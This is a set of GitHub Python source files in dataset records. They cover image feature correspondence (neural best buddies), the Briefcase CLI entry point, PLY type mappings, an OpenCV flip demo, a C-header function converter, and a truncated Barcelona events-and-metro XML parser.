correspondence\n activation = correspondence[2][index]\n new_correspondence[0].pop(index)\n new_correspondence[1].pop(index)\n new_correspondence[2].pop(index)\n\n for j in range(len(refined_correspondence_i[0])):\n new_correspondence[0].append(refined_correspondence_i[0][j])\n new_correspondence[1].append(refined_correspondence_i[1][j])\n new_correspondence[2].append(activation + refined_correspondence_i[2][j])\n\n return new_correspondence\n\n def calculate_activations(self, correspondence, F_A, F_B):\n \"\"\"\n :param correspondence: [[A_pts], [B_pts]]\n :param F_A: feature map\n :param F_B:\n :return: response_correspondence\n [[A_pts], [B_pts]] + [rank_activations]\n \"\"\"\n # normalized featrue map\n # FM.response: l2 and min_max norm F_A, F_B -> [0, 1]\n self.H_A = FM.FA_to_HA_norm(F_A)\n self.H_B = FM.FA_to_HA_norm(F_B)\n\n response_correspondence = correspondence\n response_correspondence.append([])\n for i in range(len(correspondence[0])):\n # pts and activations\n pt_A, pt_B = correspondence[0][i], correspondence[1][i]\n response_A_i = self.H_A[0, 0, pt_A[0], pt_A[1]]\n response_B_i = self.H_B[0, 0, pt_B[0], pt_B[1]]\n # rank, add for each layer\n correspondence_avg_response_i = (response_A_i + response_B_i) * 0.5\n response_correspondence[2].append(correspondence_avg_response_i)\n return response_correspondence\n\n def limit_correspondence_number_per_level(self, correspondence, F_A, F_B, tau, top=5):\n correspondence_avg_response = self.Tensor(len(correspondence[0])).fill_(0)\n for i in range(len(correspondence[0])):\n correspondence_avg_response[i] = correspondence[2][i]\n\n top_response_correspondence = [[], [], []]\n if len(correspondence[0]) > 0:\n [sorted_correspondence, ind] = correspondence_avg_response.sort(dim=0, descending=True)\n for i in range(min(top, len(correspondence[0]))):\n top_response_correspondence[0].append(correspondence[0][ind[i]])\n top_response_correspondence[1].append(correspondence[1][ind[i]])\n top_response_correspondence[2].append(sorted_correspondence[i])\n\n return top_response_correspondence\n\n def threshold_response_correspondence(self, correspondence, H_A, H_B, th):\n \"\"\"\n :param correspondence: [[A_pts], [B_pts], [rank_activation]]\n :param H_A: normalized activation map\n :param H_B:\n :param th: tau=0.05 response threshold\n :return:\n \"\"\"\n # mask\n M_A = H_A.ge(th)\n M_B = H_B.ge(th)\n # print('A mask:', M_A.sum()) # > thre 较多,但是二者位置能对应的的不多\n # print('B mask:', M_B.sum())\n\n high_correspondence = [[], [], []]\n\n # 遍历 对应点\n for i in range(len(correspondence[0])):\n M_A_i = M_A[0, 0, correspondence[0][i][0], correspondence[0][i][1]]\n M_B_i = M_B[0, 0, correspondence[1][i][0], correspondence[1][i][1]]\n # 只判断 第0维 feature 是否 > 0.05?\n if M_A_i and M_B_i:\n high_correspondence[0].append(correspondence[0][i])\n high_correspondence[1].append(correspondence[1][i])\n high_correspondence[2].append(correspondence[2][i])\n\n return high_correspondence\n\n def make_correspondence_unique(self, correspondence):\n unique_correspondence = correspondence\n for i in range(len(unique_correspondence[0]) - 1, -1, -1):\n for j in range(i - 1, -1, -1):\n if self.is_same_match(unique_correspondence[0][i], unique_correspondence[0][j]):\n unique_correspondence[0].pop(i)\n unique_correspondence[1].pop(i)\n unique_correspondence[2].pop(i)\n break\n\n return unique_correspondence\n\n def remove_border_correspondence(self, correspondence, border_width, image_width):\n filtered_correspondence = correspondence\n for i in range(len(filtered_correspondence[0]) 
- 1, -1, -1):\n x_1 = filtered_correspondence[0][i][0]\n y_1 = filtered_correspondence[0][i][1]\n x_2 = filtered_correspondence[1][i][0]\n y_2 = filtered_correspondence[1][i][1]\n if x_1 < border_width or x_1 > image_width - border_width:\n filtered_correspondence[0].pop(i)\n filtered_correspondence[1].pop(i)\n filtered_correspondence[2].pop(i)\n elif x_2 < border_width or x_2 > image_width - border_width:\n filtered_correspondence[0].pop(i)\n filtered_correspondence[1].pop(i)\n filtered_correspondence[2].pop(i)\n elif y_1 < border_width or y_1 > image_width - border_width:\n filtered_correspondence[0].pop(i)\n filtered_correspondence[1].pop(i)\n filtered_correspondence[2].pop(i)\n elif y_2 < border_width or y_2 > image_width - border_width:\n filtered_correspondence[0].pop(i)\n filtered_correspondence[1].pop(i)\n filtered_correspondence[2].pop(i)\n\n return filtered_correspondence\n\n def is_same_match(self, corr_1, corr_2):\n if corr_1[0] == corr_2[0] and corr_1[1] == corr_2[1]:\n return True\n\n def scale_correspondence(self, correspondence, level):\n scaled_correspondence = [[], [], []]\n scale_factor = int(math.pow(2, level - 1))\n for i in range(len(correspondence[0])):\n scaled_correspondence[0].append([scale_factor * correspondence[0][i][0], scale_factor * correspondence[0][i][1]])\n scaled_correspondence[1].append([scale_factor * correspondence[1][i][0], scale_factor * correspondence[1][i][1]])\n scaled_correspondence[2].append(correspondence[2][i])\n\n return scaled_correspondence\n\n def save_correspondence_as_txt(self, correspondence, name=''):\n self.save_points_as_txt(correspondence[0], 'correspondence_A' + name)\n self.save_points_as_txt(correspondence[1], 'correspondence_Bt' + name)\n\n def save_points_as_txt(self, points, name):\n file_name = os.path.join(self.save_dir, name + '.txt')\n with open(file_name, 'wt') as opt_file:\n for i in range(len(points)):\n opt_file.write('%i, %i\\n' % (points[i][0], points[i][1]))\n\n def top_k_in_clusters(self, correspondence, k):\n \"\"\"\n :param correspondence: [[A_pts], [B_pts], [rank_activation >= tau]]\n :param k:\n :return: top_cluster_correspondence: [[A_pts], [B_pts], [rank_activation >= tau]]\n \"\"\"\n if k > len(correspondence[0]):\n return correspondence\n\n correspondence_R_4 = []\n for i in range(len(correspondence[0])):\n correspondence_R_4.append([ # 聚类特征向量 dim=4, 由2组对应的空间坐标组成\n correspondence[0][i][0],\n correspondence[0][i][1],\n correspondence[1][i][0],\n correspondence[1][i][1]\n ])\n\n top_cluster_correspondence = [[], [], []]\n # print(\"Calculating K-means...\")\n kmeans = KMeans(n_clusters=k, random_state=0).fit(correspondence_R_4)\n labels = kmeans.labels_\n\n # 取每个簇 i 下的极值 idx\n cluster = {\n i: {'max_activation': 0, 'max_activation_idx': -1}\n for i in range(k)\n }\n\n for j in range(len(correspondence[0])):\n if correspondence[2][j] > cluster[labels[j]]['max_activation']:\n cluster[labels[j]]['max_activation'] = correspondence[2][j]\n cluster[labels[j]]['max_activation_idx'] = j\n\n # pprint(cluster)\n\n for i in range(k):\n max_activation_idx = cluster[i]['max_activation_idx']\n top_cluster_correspondence[0].append(correspondence[0][max_activation_idx])\n top_cluster_correspondence[1].append(correspondence[1][max_activation_idx])\n top_cluster_correspondence[2].append(correspondence[2][max_activation_idx])\n\n return top_cluster_correspondence\n\n def caculate_mid_correspondence(self, correspondence):\n mid_correspondence = []\n for i in range(len(correspondence[0])):\n x_m = 
math.floor((correspondence[0][i][0] + correspondence[1][i][0]) / 2)\n y_m = math.floor((correspondence[0][i][1] + correspondence[1][i][1]) / 2)\n mid_correspondence.append([x_m, y_m])\n\n return mid_correspondence\n\n def transfer_style_local(self, F_A, F_B, patch_size, image_width, mapping_a_to_b, mapping_b_to_a, L):\n \"\"\"\n F_A, F_B 深层特征图\n mapping_a_to_b, mapping_b_to_a 从 F_B, F_A 得到映射特征图\n FL_1A, FL_1B 浅层特征图\n + RL_1B, RL_1A 映射特征图; 从 wraped L 层 学到 L-1 层\n 取均值,得到 common local feature\n \"\"\"\n\n # L 层的 mapping, upsample 到 L-1 层\n initial_map_a_to_b = self.upsample_mapping(mapping_a_to_b) # nearest 上采样 mapping, 在对应区域 coarse-to-fine\n initial_map_b_to_a = self.upsample_mapping(mapping_b_to_a)\n\n FL_1A = self.features_A[L - 2] # -1 上一层, -1 idx 从 0\n FL_1B = self.features_B[L - 2]\n\n t1 = time.time()\n\n # B->A\n F_B_warped = self.warp(F_A.size(), F_B, patch_size, mapping_a_to_b) # B 特征 wrap 到 A(i,j) 位置\n F_A_warped = self.warp(F_B.size(), F_A, patch_size, mapping_b_to_a) # A 特征 wrap 到 B(i,j) 位置\n\n # Note: freeze 中间 layer [L-1,L];\n # 更新对象:和 L-1 层 feature 同 size 的 feature; 使模型输出 和 warped feature 相似\n RL_1B = self.model.deconv(F_B_warped, image_width, L, L - 1)\n RL_1A = self.model.deconv(F_A_warped, image_width, L, L - 1)\n print('warp time:', time.time() - t1)\n # 1.0, 2.19, 2.92, 2.70 # 模型学得过程竟然还更快一些\n\n # RL_1B = self.warp(FL_1A.size(), FL_1B, patch_size, initial_map_a_to_b)\n # RL_1A = self.warp(FL_1B.size(), FL_1A, patch_size, initial_map_a_to_b)\n # print('warp time:', time.time() - t1)\n # 0.22, 0.88, 3.53, 14\n\n # 浅层 feature + 深层 feature 映射坐标位\n FL_1Am = (FL_1A + RL_1B) * 0.5 # unnormalized\n FL_1Bm = (FL_1B + RL_1A) * 0.5\n\n return [FL_1A, FL_1B, FL_1Am, FL_1Bm, initial_map_a_to_b, initial_map_b_to_a]\n\n def finalize_correspondence(self, correspondence, image_width, L):\n print(\"Drawing correspondence...\")\n unique_correspondence = self.make_correspondence_unique(correspondence)\n scaled_correspondence = self.scale_correspondence(unique_correspondence, L)\n # draw.draw_correspondence(self.A, self.B, scaled_correspondence, self.draw_radius[L - 1], self.save_dir, L)\n scaled_correspondence = self.remove_border_correspondence(scaled_correspondence, self.border_size, image_width)\n print(\"No. 
of correspondence: \", len(scaled_correspondence[0]))\n return scaled_correspondence\n\n def run(self, A, B):\n assert (A.size() == B.size())\n image_width = A.size(3)\n util.mkdir(self.save_dir)\n\n print(\"Saving original images...\")\n util.save_final_image(A, 'original_A', self.save_dir)\n util.save_final_image(B, 'original_B', self.save_dir)\n\n self.A = self.Tensor(A.size()).copy_(A)\n self.B = self.Tensor(B.size()).copy_(B)\n\n print(\"Starting algorithm...\")\n # coarse-to-fine\n L_start = 5\n\n # todo: 直接获取所有需要使用的中间特征\n self.model.set_input(self.A)\n self.features_A = self.model.get_all_layer_output(L_start)\n self.model.set_input(self.B)\n self.features_B = self.model.get_all_layer_output(L_start)\n\n F_A = self.features_A[L_start - 1]\n F_B = self.features_B[L_start - 1]\n F_Am, F_Bm = F_A.clone(), F_B.clone()\n\n # 1.初始坐标位 a_to_b, b_to_a\n initial_map_a_to_b = self.identity_map(F_B.size()) # 1,512,14,14\n initial_map_b_to_a = initial_map_a_to_b.clone()\n\n # L: deepest to shallowest\n for L in range(L_start, self.L_final - 1, -1): # 5, self.L_final = 2 if fast else 1\n patch_size = self.patch_size_list[L - 1] # [3,3]\n search_box_radius = self.search_box_radius_list[L - 1] # 2, (path+1)/2\n draw_radius = self.draw_radius[L - 1] # 8\n\n if L == L_start:\n deepest_level = True # 最深层\n correspondence = [] # begin\n else:\n deepest_level = False\n # correspondence: 中间层,基于上轮(+1层) correspondence 寻找 search region\n\n print(\"Finding best-buddies for the \" + str(L) + \"-th level\")\n\n # 2.对应后坐标位 和 NBBs\n # correspondence: [[A_pts], [B_pts], [rank_activation]]\n # mapping_a_to_b, mapping_b_to_a; 坐标位\n correspondence, mapping_a_to_b, mapping_b_to_a = self.find_neural_best_buddies(\n correspondence, F_A, F_B, F_Am, F_Bm, patch_size,\n initial_map_a_to_b, initial_map_b_to_a,\n search_box_radius, deepest_level\n )\n\n # 3.tau 过滤 H(p)\n # correspondence: [[A_pts], [B_pts], [rank_activation >= tau]]\n correspondence = self.threshold_response_correspondence(correspondence,\n self.H_A, self.H_B, # l2 and min_max norm feature\n self.tau) # 可以不用手工设置,保留一些统计结果?\n # print(f'thre >= {self.tau}:', len(correspondence[0]))\n\n # 设置 k_per_level, 由深到浅的每一层 都执行 k-means 选择 NBBs; 减少计算量\n if self.k_per_level < float('inf'):\n correspondence = self.top_k_in_clusters(correspondence, int(self.k_per_level))\n # print(f'cluster k({self.k_per_level}):', len(correspondence[0]))\n\n # scale_correspondence 坐标位,在原图画出对应\n if L > self.L_final:\n # print(\"Drawing correspondence...\")\n scaled_correspondence = self.scale_correspondence(correspondence, L)\n # draw.draw_correspondence(self.A, self.B, scaled_correspondence, draw_radius, self.save_dir, L)\n\n # 获取 L-1 层特征\n F_A, F_B, F_Am, F_Bm, initial_map_a_to_b, initial_map_b_to_a = self.transfer_style_local(\n F_A, F_B, patch_size, image_width, mapping_a_to_b, mapping_b_to_a, L\n )\n\n filtered_correspondence = self.finalize_correspondence(correspondence, image_width, self.L_final)\n top_k_correspondence = self.top_k_in_clusters(filtered_correspondence, self.k_final)\n\n # draw and save\n # final L=1\n draw_radius = self.draw_radius[self.L_final - 1]\n # draw.draw_correspondence(self.A, self.B, filtered_correspondence, draw_radius, self.save_dir, self.L_final)\n # self.save_correspondence_as_txt(filtered_correspondence)\n\n # final L=1, top k\n draw.draw_correspondence(self.A, self.B, top_k_correspondence, draw_radius, self.save_dir, self.L_final, self.k_final)\n self.save_correspondence_as_txt(top_k_correspondence, name='_top_' + str(self.k_final))\n\n # return 
scaled_correspondence\n return top_k_correspondence\n","repo_name":"Shuai-Xie/NBBs","sub_path":"algorithms/neural_best_buddies.py","file_name":"neural_best_buddies.py","file_ext":"py","file_size_in_byte":28759,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"97"} +{"seq_id":"13346652791","text":"import sys\n\nfrom .cmdline import parse_cmdline\nfrom .exceptions import BriefcaseError\n\n\ndef main():\n try:\n command, options = parse_cmdline(sys.argv[1:])\n command.parse_config('pyproject.toml')\n command(**options)\n result = 0\n except BriefcaseError as e:\n print(e, file=sys.stdout if e.error_code == 0 else sys.stderr)\n result = e.error_code\n except KeyboardInterrupt:\n print()\n print(\"Aborted by user.\")\n print()\n result = -42\n\n sys.exit(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"IvanaXu/PyTools","sub_path":"077.Test_BeeWare_windows/beeware-tutorial/beeware-venv/Lib/site-packages/briefcase/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"97"} +{"seq_id":"22701569029","text":"import numpy as np\nfrom .PlyException import CPlyException\n\ndicPlyToNp = {\n \"char\": \"i1\",\n \"short\": \"i2\",\n \"int\": \"i4\",\n \"uchar\": \"u1\",\n \"ushort\": \"u2\",\n \"uint\": \"u4\",\n \"int8\": \"i1\",\n \"int16\": \"i2\",\n \"int32\": \"i4\",\n \"uint8\": \"u1\",\n \"uint16\": \"u2\",\n \"uint32\": \"u4\",\n \"float\": \"f4\",\n \"double\": \"f8\",\n \"float16\": \"f2\",\n \"float32\": \"f4\",\n \"float64\": \"f8\",\n}\n\ndicNpToPly = {\n \"i1\": \"char\",\n \"i2\": \"short\",\n \"i4\": \"int\",\n \"u1\": \"uchar\",\n \"u2\": \"ushort\",\n \"u4\": \"uint\",\n \"f2\": \"float16\",\n \"f4\": \"float\",\n \"f8\": \"double\",\n}\n\n\ndef _ApplyFormatToType(_sType, _sFormat):\n\n if _sFormat == \"binary_little_endian\":\n sType = \"<\" + _sType\n elif _sFormat == \"binary_big_endian\":\n sType = \">\" + _sType\n elif _sFormat == \"ascii\":\n sType = _sType\n else:\n raise CPlyException(\"Unknown PLY format identifier '{0}'\".format(_sFormat))\n # endif\n\n return sType\n\n\n# enddef\n\n\ndef GetNamedNumpyType(*, sName, sPlyType, sFormat):\n sNpType = dicPlyToNp.get(sPlyType)\n if sNpType is None:\n raise CPlyException(\"Unknown PLY type identifier '{0}'\".format(sPlyType))\n # endif\n\n sNpType = _ApplyFormatToType(sNpType, sFormat)\n return np.dtype([(sName, sNpType)])\n\n\n# enddef\n\n\ndef GetNumpyType(*, sPlyType, sFormat):\n sNpType = dicPlyToNp.get(sPlyType)\n if sNpType is None:\n raise CPlyException(\"Unknown PLY type identifier '{0}'\".format(sPlyType))\n # endif\n\n sNpType = _ApplyFormatToType(sNpType, sFormat)\n return np.dtype(sNpType)\n\n\n# enddef\n","repo_name":"boschresearch/image-render-blender-points","sub_path":"src/anypoints/plyio/PlyType.py","file_name":"PlyType.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"17420881059","text":"import cv2\nimport numpy as np\n\nimage = cv2.imread(\"cow.jpg\")\ncv2.imshow(\"image\", image)\n\n# flip vertically (flipCode 0 flips around the x-axis)\nflipped1 = cv2.flip(image, 0)\ncv2.imshow(\"image1\", flipped1)\n\n# flip horizontally (flipCode 1 flips around the y-axis)\nflipped2 = cv2.flip(image, 1)\ncv2.imshow(\"image2\", flipped2)\n\n# flip both horizontally and vertically\nflipped3 = cv2.flip(image, -1)\ncv2.imshow(\"image3\", 
flipped3)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"mhdr/OpenCVSamples","sub_path":"009/flip.py","file_name":"flip.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"3829448932","text":"# Parses a low-level driver C-header file looking for function declarations.\n# Converts only the function declarations to mid-level driver compatible declarations.\n\nimport re\n# Create a function-matching regex.\n# fn_regex = re.compile(r'.+?\\s+?.+?\\s+?.+?\\(.+?\\);')\nfn_regex = re.compile(r'^([^()]*\\s+)*[^()]+\\(.*\\);')\n\n# Startup arguments.\nIN_FILENAME = 'input/tl.h'\nOUT_FILENAME = 'tl_h_fn_out.py'\nAUTO_DETECT_PREFIX = True\n\nf = open(IN_FILENAME, 'r')\noutfiles = []\nif AUTO_DETECT_PREFIX == False:\n o = open('output/' + OUT_FILENAME, 'w')\nelse:\n o = None\n\nprefixes = []\nopened_output_files = []\nignorable_definitions = []\n\ni = 0\npack = 0\nwithin_struct = False\nstruct_name = ''\nwhile True:\n i += 1\n line = f.readline()\n if not line:\n break\n\n # First, get rid of extraneous symbols.\n line = line.replace('\\n', '')\n # line = line.replace(';', '')\n line = line.strip()\n # print(line)\n\n # Finds empty #defines and makes a list of them.\n if line.startswith('#define '):\n # This ensures that in the event of:\n # '#define IMPORTANT_VALUE 5' the ignorable string will be 'IMPORTANT_VALUE 5', and\n # therefore won't ever match. However, if it is instead:\n # '#define USELESS_DEFINE' then the string will be 'USELESS_DEFINE' and will match.\n ignorable_definitions.append(line[8 : len(line)])\n continue\n\n if fn_regex.match(line) is not None:\n # print(str(i) + ': ' + line)\n print(\"LINE \" + str(i) + ': ')\n\n # Figure out the function's name.\n fn_split = line.split(' ')\n fn_split = [section.strip() for section in fn_split]\n # print(fn_split)\n j = 0\n while True:\n if j >= len(fn_split):\n j = -1\n break\n retval = fn_split[j].find('(')\n # print(\"RETVAL: \" + str(retval))\n if retval == -1:\n # No '(' found, keep looking.\n j += 1\n continue\n elif retval == 0:\n # '(' found, but its the first char in the string. 
Function format must be: name (args), so use previous\n # string entry in the list.\n j -= 1\n break\n else:\n break\n\n if j < 0:\n print(\"Failed to parse function on line \" + str(i) + \"!\")\n exit()\n\n if fn_split[j].find('(') != -1:\n fn_name = fn_split[j][0 : fn_split[j].find('(')]\n else:\n fn_name = fn_split[j]\n fn_ret = ''\n k = 0\n while True:\n if k == j:\n break\n fn_ret = fn_ret + fn_split[k] + ' '\n k += 1\n\n # Removes blank #defines from in front of the return type; reduces clutter and confusion.\n for substring in ignorable_definitions:\n if fn_ret.startswith(substring):\n fn_ret = fn_ret[len(substring) + 1 :]\n break \n\n print(\"Function return type: \" + fn_ret)\n\n print(\"Function name: \" + fn_name)\n\n fn_prefix = fn_name.split('_')[0]\n print(\"Function prefix: \" + fn_prefix)\n\n if AUTO_DETECT_PREFIX:\n fn_prefixed_outfilename = fn_prefix + '_' + OUT_FILENAME\n print(\"Output file: \" + fn_prefixed_outfilename)\n if fn_prefix not in prefixes:\n # File not yet opened.\n outfiles.append((fn_prefixed_outfilename, open('output/' + fn_prefixed_outfilename, 'w')))\n prefixes.append(fn_prefix)\n o = [file for (name, file) in outfiles if name == fn_prefixed_outfilename][0]\n # print(o)\n\n # Remove prefix from function's name.\n fn_name = fn_name[len(fn_prefix) + 1: len(fn_name)]\n \n # Find the function's arguments.\n fn_args = line[line.find('(') + 1 : line.find(')')].split(',')\n fn_args = [arg.strip() for arg in fn_args]\n if (len(fn_args) == 0):\n print(\"Function args: NO ARGUMENTS\")\n else:\n print(\"Function args:\")\n print(fn_args)\n\n # Write data for this function to file.\n o.write(fn_name + ' = Sig(')\n\n # Determine args as 'in' or 'out.'\n # If there are more than 0 arguments.\n if fn_args[0] != '' and fn_args[0] != 'void':\n first = True\n for arg in fn_args:\n # print(arg)\n if (arg.find('**') != -1):\n print('out')\n if first:\n first = False\n else:\n o.write(', ')\n o.write('\\'out\\'')\n else:\n if first:\n first = False\n else:\n o.write(', ')\n print('in')\n o.write('\\'in\\'')\n if (fn_ret.find('void') != -1):\n o.write(', ')\n if (fn_ret.find('void') != -1):\n o.write('ret=ret_ignore')\n\n o.write(')\\n')\n\n\n print('\\n')\n\nfor (name, file) in outfiles:\n file.close()\n","repo_name":"mitbailey/driver_converter","sub_path":"fn_convert.py","file_name":"fn_convert.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"34005737119","text":"#!/usr/bin/python3\n\n# PEP Guidelines:\n################################COMMENT################################\n#####################################CODE##################################### \n\n#############################\n# We got company. #\n# Imports? #\n# How many? #\n# Uh, all of them, I think. #\n#############################\n\nimport sys\nimport os\nimport re\nimport argparse\nimport urllib.request\nimport xml.etree.ElementTree as ET \nimport math\nimport unicodedata\nfrom datetime import datetime, timedelta\nfrom ast import literal_eval\n\nDATE_FORMAT = \"%d/%m/%Y\"\nFULL_FORMAT = \"%d/%m/%Y %H.%M\"\n\n\n\"\"\" PROJECT ASSUMPTIONS\n\n -> All arguments are separated just by commas ','\n and NOT by comma and space ', ' !!!\n\n -> Metros can only go in lists, and checks for all metro stations\n that come as an argument. Lists are disjunctive (OR).\n\n -> Dates are parsed as a list. Each list can contain either a string\n (single date) or a tuple (interval of dates). 
No lists are allowed\n inside dates, as it would be pointless for its evaluation.\n Also, It doesn't matter if the interval numbers are positive \n or negative, dates will be normalized.\n\n -> The top 5 metro stations are sorted by their exits. Also, other \n public transport services (bus, tram...) won't be parsed, \n excluding FGC (they a part of the metro network!)\n \n -> The script will automatically open the generated XML with Firefox\n on (at least) GNU/Linux, not any other browsers or OSs. \n If you don't have it installed, you'll have to open the file\n <index.html> manually.\n\n -> Children are people under 18 y.o. Note that sometimes the keywords\n may produce unsuitable results. These are NEVER intended!\n\n\"\"\"\n\n####################\n# Argument parsing #\n####################\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--key', \n help='select items containing keys', \n type=str\n)\nparser.add_argument('--date', \n help='get items on date (or interval of dates)', \n type=str\n)\nparser.add_argument('--metro', \n help='get metro stations from BCN\\'s metro. Range: 1..11', \n type=str\n)\nargs = parser.parse_args()\n\nArgs_Keys = []\nArgs_Dates = []\nArgs_Metro = []\n\n\n###########\n# Classes #\n###########\n \nclass Address:\n def __init__(self, locRoot):\n asimp = locRoot.find('.//adreca_simple')\n self.name = asimp.find('carrer').text\n self.numero = int(asimp.find('numero').text)\n self.barri = asimp.find('barri').text\n self.coord = self._Process_Coord(locRoot.find('.//coordenades'))\n \n def _Process_Coord(self, coord): # PRIVATE\n gMaps = coord.find('googleMaps')\n lontxt = gMaps.get('lon')\n lattxt = gMaps.get('lat')\n try:\n lon = float(lontxt)\n lat = float(lattxt)\n return (lat, lon)\n except :\n return (-1.0, -1.0) # Unknown location -> No metro for you\n\n\n def __repr__(self):\n return self.name + \" \\n \" + self.barri + \"\\n C \" + str(self.coord) \n\n def getName(self): \n return self.name + ', ' + str(self.numero)\n \n def getNumber(self): \n return self.numero\n\n def getBarri(self): \n return self.barri\n\n def getLongitude(self): \n return self.coord[1]\n \n def getLatitude(self): \n return self.coord[0]\n\n\nclass Event:\n def __init__(self, act, ageRange):\n self.name = act.find('nom').text\n self.address = Address(act.find('.//lloc_simple'))\n self.age = ageRange\n\n day = act.find('.//data_proper_acte').text\n self.date = datetime.strptime(day, FULL_FORMAT)\n\n\n def getName(self): \n return self.name\n \n def getAddress(self): \n return self.address\n\n def getAge(self): \n return self.age\n\n# ADD/SUBTRACT TIME IN days USING TODAY AS A REFERENCE: \n# datetime.today() {+|-} timedelta(days=5)\n#\n \n def getFullDate(self):\n return self.getDateAsDTDT().strftime(FULL_FORMAT)\n \n def getDate(self):\n return self.getDateAsDTDT().strftime(DATE_FORMAT)\n\n def getDateAsDTDT(self):\n return self.date\n\n\n def __repr__(self):\n name = self.name \n addr = \"\\n \" + self.address.__repr__()\n age = \"\\n \" + self.age\n date = \"\\n \" + self.date.strftime(DATE_FORMAT) + \"\\n\"\n return name + addr + age + date\n\n\n def getLongitude(self):\n return self.address.getLongitude()\n \n\n def getLatitude(self):\n return self.address.getLatitude()\n\n\n\"\"\" \n Note: Metro stations appear several times, but on the\n ranking there (may not) be any stations repeated!\n\"\"\"\nclass Metro:\n def __init__(self, act):\n self.name = clean(act.find('Tooltip').text)[:-1] #remove '-'\n self.lat = float(act.find('Coord').find('Latitud').text)\n self.lon 
= float(act.find('Coord').find('Longitud').text)\n\n    def __repr__(self):\n        return self.name + \" [\" + str(self.lat) + \", \" + str(self.lon) + \"]\"\n\n    def getFullName(self):\n        return self.name\n\n    def getStationName(self):\n        # station name is the text before the \" (\" suffix\n        return self.name[:self.name.index(\" (\")]\n\n    def getLongitude(self):\n        return self.lon\n\n    def getLatitude(self):\n        return self.lat\n\n\n####################################################\n# Functions: data parsing, maths, cleaning, etc... #\n####################################################\n\n\ndef fillKeys(Keys):\n    return literal_eval(Keys)\n\ndef fillDate(Dates):\n    rgx = \"([0-3][0-9]/[0-1][0-9]/[0-9][0-9][0-9][0-9])\"\n    regex_dates = re.sub(rgx, \"\\\"\\g<1>\\\"\", Dates)\n    return literal_eval(regex_dates)\n\ndef fillMetro(Metros):\n    return Metros[1:-1].split(',')\n\n\n# Get all current activities suitable for children\ndef Children_Activities():\n    Dict = dict()\n    # Expressions that will (or may) return activities for kids\n    # Assumed these age ratings per filter found *at first*\n    filters = [\n        ('famil', \"Per a tots els públics\"),\n        ('nadal', \"Per a tots els públics\"),\n        ('infant', \"De 3 a 11 anys\"),\n        ('titell', \"De 0 a 8 anys\"),\n        ('petit', \"De 2 a 10 anys\"),\n        ('escol', \"De 3 a 16 anys\"),\n        ('jug', \"De 5 a 15 anys\"),\n        ('sport', \"De 7 a 18 anys\"),\n        ('jove', \"De 10 a 18 anys\")\n    ]\n\n    for fltr in filters:\n        for act in root_events.findall('.//acte'):\n            name = clean( act.find('nom').text )\n\n            llocsimp = act.find('.//lloc_simple')\n            lloc = clean( llocsimp.find('nom').text )\n\n            adrec = llocsimp.find('.//adreca_simple')\n            if (adrec.find('barri').get('codi') != \"\"):\n                barri = clean( adrec.find('barri').text )\n                # the keyword must appear in the name, the venue or the neighbourhood\n                if fltr[0] in name or fltr[0] in lloc or fltr[0] in barri:\n                    Dict[name] = Event(act, fltr[1])\n\n    return Dict\n\n## Filters for keys ##\n\n# Checks if word is in event\ndef findWord(event, word):\n    name = clean(event.getName())\n    lloc = clean(event.getAddress().getName())\n    barri = clean(event.getAddress().getBarri())\n    return word in name or word in lloc or word in barri\n\ndef check(event, Expr_Filter):\n    #BASE CASE:\n    if type(Expr_Filter) is str:\n        return findWord(event, Expr_Filter)\n\n    #LIST CASE, recursive AND\n    elif type(Expr_Filter) is list:\n        return all(check(event, item) for item in Expr_Filter)\n\n    #TUPLE CASE, recursive OR\n    elif type(Expr_Filter) is tuple:\n        return any(check(event, item) for item in Expr_Filter)\n\n    #Debug case, should never happen.\n    else: return False\n\n\n## Filters for dates ##\n\ndef findDate(event, datestr):\n    tmpDate = datetime.strptime(datestr, DATE_FORMAT).date()\n    EventDate = event.getDateAsDTDT().date()\n\n    return (EventDate == tmpDate)\n\n\ndef findDateTuple(event, datetup):\n    tmpDate = datetime.strptime(datetup[0], DATE_FORMAT).date()\n    DateMin = tmpDate - timedelta(days = abs(datetup[1]))\n    DateMax = tmpDate + timedelta(days = abs(datetup[2]))\n    EventDate = event.getDateAsDTDT().date()\n\n    return (DateMin <= EventDate <= DateMax)\n\ndef dateCheck(event, DateList):\n    #BASE CASE => One item, check if event matches day:\n    if type(DateList) is str:\n        return findDate(event, DateList)\n\n    #TUPLE CASE (Base case 2), check interval\n    elif type(DateList) is tuple:\n        return findDateTuple(event, DateList)\n\n    #LIST CASE, recursive OR\n    elif type(DateList) is list:\n        return any(dateCheck(event, item) for item in DateList)\n\n    #Debug case, should never happen.\n    else: return False\n\n\n
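# A sketch of how the nested filter expressions evaluate (illustrative\n# keywords only, not output of this script): strings are substring tests,\n# lists are recursive ANDs and tuples are recursive ORs, e.g.\n#   check(event, [\"infant\", (\"titell\", \"petit\")])\n#   -> contains \"infant\" AND (contains \"titell\" OR contains \"petit\")\n# Dates work the same way, with tuples meaning +/- day intervals:\n#   dateCheck(event, [(\"01/01/2019\", 2, 2), \"06/01/2019\"])\n#   -> within 30/12/2018..03/01/2019 OR exactly on 06/01/2019\n\n\n# Only parse stations from the lines chosen\ndef parseMetroArgs(Args_Metro):\n    getMetro = dict()\n    for fm in 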
